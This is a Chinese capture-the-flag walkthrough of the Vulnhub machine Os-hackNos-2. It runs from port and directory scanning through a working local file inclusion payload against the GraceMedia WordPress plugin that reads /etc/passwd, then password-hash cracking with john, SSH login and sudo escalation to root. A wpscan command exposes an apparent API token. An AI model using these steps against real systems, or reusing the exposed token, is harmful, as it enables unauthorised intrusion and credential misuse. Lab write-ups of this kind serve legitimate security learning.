Vulnhub Os-hackNos-2
0x01 靶机介绍
-
Name: hackNos: Os-hackNos-2.1
-
Date release: 29 Nov 2019
-
Author: Rahul Gehlaut
-
Series: hackNos
-
Difficulty : Easy to Intermediate
-
Flag : 2 Flag first user And second root
-
Learning : Web Application | Enumeration | Password Cracking
靶机下载地址:https://www.vulnhub.com/entry/hacknos-os-hacknos-2,403/
0x02 侦查
端口探测
首先使用 nmap 进行端口扫描
-
1
nmap -p- -sV -sC -A 192.168.0.104 -oA nmap_Os-hackNos-2
扫描结果显示目标开放了80端口。
80端口
访问http://192.168.0.104为 Apache 默认界面
扫描目录
使用 gobuster 进行目录扫描,成功找到目录/tsweb
-
1
gobuster dir -u http://192.168.0.104 -w /usr/share/wordlists/dirb/big.txt
进一步进行目录扫描,结果显示为 WordPress 的常见目录及文件
-
1
gobuster dir -u http://192.168.0.104/tsweb -w /usr/share/wordlists/dirb/big.txt
站点采用 WordPress 框架
漏洞扫描
使用 wpscan 对站点进行漏洞扫描
-
1
wpscan --url http://192.168.0.104/tsweb --api-token Rjr3NLjvRw21PbkmvY6h4EI1uqS5wB9lzCpPiLziH3A
根据扫描结果判断可能存在本地文件包含漏洞
0x03 上线[flag]
文件包含
访问https://www.exploit-db.com/exploits/46537查看漏洞详情
利用文件包含成功读取/etc/passwd文件,其中存在 flag 用户及对应哈希
-
1
http://192.168.0.104/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
$1$表示密文采用 md5 加密
-
1
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
哈希破解
使用 john 进行爆破,成功拿到密码为topsecret
-
1
john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt passwd
SSH登录
使用账号密码成功登录 SSH 服务
-
1
ssh [email protected]
0x04 权限提升[ohit]
信息收集
查看当前用户存在用户root、rohit
-
1
cat /etc/passwd | grep bash
枚举找到 md5 哈希值
-
1
cat /var/backups/passbkp/md5-hash
-
1
$1$rohit$01Dl0NQKtgfeL08fGrggi0
哈希破解
使用 john 进行破解,成功拿到密码为!%hack41
-
1
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt rohit
利用 su 切换用户输入密码
-
1
-
2
su rohit
cd ~
成功拿到第一个flag
-
1
cat user.txt
0x05 权限提升[root]
信息收集
查看当前用户 sudo 权限,以管理员权限执行无需密码
-
1
sudo -l
sudo提权
配合 sudo 成功提权至管理员用户
-
1
-
2
sudo su
id
在管理员家目录下拿到第二个flag
-
1
-
2
cd ~
cat root.txt
0x06 知识星球
原文始发于微信公众号(狐狸说安全):Vulnhub-Os-hackNos-2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论